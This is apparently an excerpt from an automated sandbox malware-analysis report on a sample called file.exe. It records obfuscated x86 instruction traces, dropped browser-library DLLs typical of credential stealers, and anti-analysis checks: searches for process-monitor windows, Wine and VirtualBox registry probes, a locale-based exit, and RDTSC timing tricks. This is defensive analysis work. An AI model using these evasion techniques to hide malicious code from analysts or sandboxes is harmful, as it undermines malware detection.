Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push ebx; mov dword ptr [esp], 40E6D361h	0_2_00613B0A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push ebx; mov dword ptr [esp], 7FEB23DBh	0_2_00613B16
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push edi; mov dword ptr [esp], edx	0_2_00613B51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push 67DE5FB0h; mov dword ptr [esp], edx	0_2_00613B62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push eax; mov dword ptr [esp], ebx	0_2_00613C4B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push eax; mov dword ptr [esp], esi	0_2_00613F3F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push 4813E243h; mov dword ptr [esp], ebp	0_2_00613F61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push 2CC7ADE2h; mov dword ptr [esp], edx	0_2_0061404A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push ebx; mov dword ptr [esp], 17A6B3C0h	0_2_0061405C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push 76B991D1h; mov dword ptr [esp], ecx	0_2_006141AF

Source: file.exe

Static PE information: section name: wrqldbzh entropy: 7.952482837111148

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00269860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58080

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B23A4 second address: 4B23AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B23AA second address: 4B1BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 cmc 0x0000000a push dword ptr [ebp+122D10F5h] 0x00000010 or dword ptr [ebp+122D2707h], ecx 0x00000016 call dword ptr [ebp+122D1807h] 0x0000001c pushad 0x0000001d clc 0x0000001e pushad 0x0000001f sbb ecx, 49878FA4h 0x00000025 jnp 00007F2810BC4667h 0x0000002b stc 0x0000002c popad 0x0000002d xor eax, eax 0x0000002f mov dword ptr [ebp+122D2102h], ebx 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 pushad 0x0000003a and ecx, dword ptr [ebp+122D3A49h] 0x00000040 jmp 00007F2810BC4671h 0x00000045 popad 0x00000046 mov dword ptr [ebp+122D396Dh], eax 0x0000004c jmp 00007F2810BC4674h 0x00000051 mov dword ptr [ebp+122D2956h], edx 0x00000057 mov esi, 0000003Ch 0x0000005c jmp 00007F2810BC466Bh 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 mov dword ptr [ebp+122D2102h], eax 0x0000006b lodsw 0x0000006d pushad 0x0000006e sub dword ptr [ebp+122D18D5h], eax 0x00000074 mov dword ptr [ebp+122D2102h], edx 0x0000007a popad 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f pushad 0x00000080 or edi, dword ptr [ebp+122D3AB5h] 0x00000086 add bl, 00000067h 0x00000089 popad 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e mov dword ptr [ebp+122D2956h], edi 0x00000094 nop 0x00000095 push esi 0x00000096 push eax 0x00000097 push edx 0x00000098 pushad 0x00000099 popad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1BCD second address: 4B1BED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1BED second address: 4B1BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61BAC3 second address: 61BACB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61BACB second address: 61BAD5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2810BC467Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62286A second address: 622870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 622870 second address: 622874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 622874 second address: 6228AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F28107458A0h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jc 00007F28107458C1h 0x00000013 jno 00007F28107458A7h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6228AC second address: 6228B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6228B2 second address: 6228B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 622D05 second address: 622D32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F2810BC4673h 0x00000008 jg 00007F2810BC4666h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007F2810BC4666h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 622FA6 second address: 622FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28107458A3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edi 0x0000000d push ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 622FC5 second address: 622FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2810BC4666h 0x0000000a popad 0x0000000b push edx 0x0000000c jno 00007F2810BC4666h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62510D second address: 625112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 625112 second address: 625118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 625118 second address: 625198 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2810745896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F28107458A2h 0x00000013 je 00007F28107458A8h 0x00000019 jmp 00007F28107458A2h 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F2810745898h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push ecx 0x0000003b mov ecx, dword ptr [ebp+122D3795h] 0x00000041 pop edx 0x00000042 mov dx, ax 0x00000045 push 00000000h 0x00000047 mov dword ptr [ebp+122D1B58h], edx 0x0000004d push E54793D1h 0x00000052 jc 00007F28107458B4h 0x00000058 push eax 0x00000059 push edx 0x0000005a jnl 00007F2810745896h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 625198 second address: 62525D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4672h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1AB86CAFh 0x00000010 jbe 00007F2810BC4671h 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D1800h], edi 0x0000001e push 00000000h 0x00000020 add si, BE00h 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F2810BC4668h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 stc 0x00000042 push 6C26DC61h 0x00000047 jmp 00007F2810BC4678h 0x0000004c add dword ptr [esp], 53D9239Fh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F2810BC4668h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 00000018h 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d lea ebx, dword ptr [ebp+12447004h] 0x00000073 mov dword ptr [ebp+122D28B6h], edi 0x00000079 sub ecx, 74652167h 0x0000007f xchg eax, ebx 0x00000080 jmp 00007F2810BC466Ah 0x00000085 push eax 0x00000086 pushad 0x00000087 push eax 0x00000088 push edx 0x00000089 push eax 0x0000008a pop eax 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62525D second address: 625261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62528E second address: 625292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 625292 second address: 6252A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F281074589Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6252A6 second address: 6252AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6252AC second address: 6252E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov di, si 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2968h], ebx 0x00000017 push 23C612C3h 0x0000001c push eax 0x0000001d push edx 0x0000001e jo 00007F2810745898h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6252E2 second address: 62538D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F2810BC4666h 0x00000009 jno 00007F2810BC4666h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 23C61243h 0x00000019 adc si, B960h 0x0000001e push 00000003h 0x00000020 jc 00007F2810BC466Ah 0x00000026 push 00000000h 0x00000028 mov edi, dword ptr [ebp+122D3A01h] 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F2810BC4668h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a jmp 00007F2810BC4672h 0x0000004f push 4396A71Bh 0x00000054 jbe 00007F2810BC467Ah 0x0000005a jns 00007F2810BC4674h 0x00000060 add dword ptr [esp], 7C6958E5h 0x00000067 sub dword ptr [ebp+122D294Fh], esi 0x0000006d lea ebx, dword ptr [ebp+1244700Dh] 0x00000073 xor edi, dword ptr [ebp+122D3805h] 0x00000079 xchg eax, ebx 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d jns 00007F2810BC4666h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62538D second address: 62539B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F2810745896h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62539B second address: 62539F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62541A second address: 62541F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6254EE second address: 62554B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2810BC4666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2810BC466Ah 0x0000000f popad 0x00000010 add dword ptr [esp], 101E7FA0h 0x00000017 mov di, dx 0x0000001a lea ebx, dword ptr [ebp+12447018h] 0x00000020 call 00007F2810BC4678h 0x00000025 clc 0x00000026 pop ecx 0x00000027 xchg eax, ebx 0x00000028 js 00007F2810BC4672h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jp 00007F2810BC4668h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6460D6 second address: 6460E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6460E0 second address: 6460E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 643FD6 second address: 643FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 643FDC second address: 643FED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC466Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 644293 second address: 644298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 644554 second address: 644576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 ja 00007F2810BC4666h 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 jp 00007F2810BC466Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 644B46 second address: 644B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 644B4C second address: 644B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 644B50 second address: 644B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 644B56 second address: 644B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jp 00007F2810BC4666h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 644B69 second address: 644B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64592F second address: 64595E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jne 00007F2810BC4672h 0x00000010 jmp 00007F2810BC466Ah 0x00000015 push edi 0x00000016 pop edi 0x00000017 jnp 00007F2810BC466Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 645ABD second address: 645AD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 645AD6 second address: 645AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2810BC4671h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F2810BC4666h 0x00000012 jne 00007F2810BC4666h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64A37E second address: 64A383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64B614 second address: 64B637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2810BC466Ch 0x0000000b popad 0x0000000c jmp 00007F2810BC4670h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64B637 second address: 64B663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F2810745896h 0x00000009 jmp 00007F281074589Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F281074589Eh 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64B663 second address: 64B669 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64B669 second address: 64B69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F28107458A8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F28107458A0h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65131B second address: 651325 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2810BC4672h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 651325 second address: 65132B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650AD7 second address: 650ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650ADD second address: 650AE3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6511DD second address: 6511F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4675h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 652E78 second address: 652E9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 06EB7456h 0x0000000e and edi, 04A816BFh 0x00000014 call 00007F2810745899h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 652E9A second address: 652E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 652E9E second address: 652EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 652EA7 second address: 652EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F2810BC4671h 0x0000000d jmp 00007F2810BC4679h 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 je 00007F2810BC4674h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65358E second address: 6535A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653B35 second address: 653B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 653B3B second address: 653B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 je 00007F281074589Eh 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6540DD second address: 6540E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 611A13 second address: 611A18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 658388 second address: 65838C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65838C second address: 658391 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
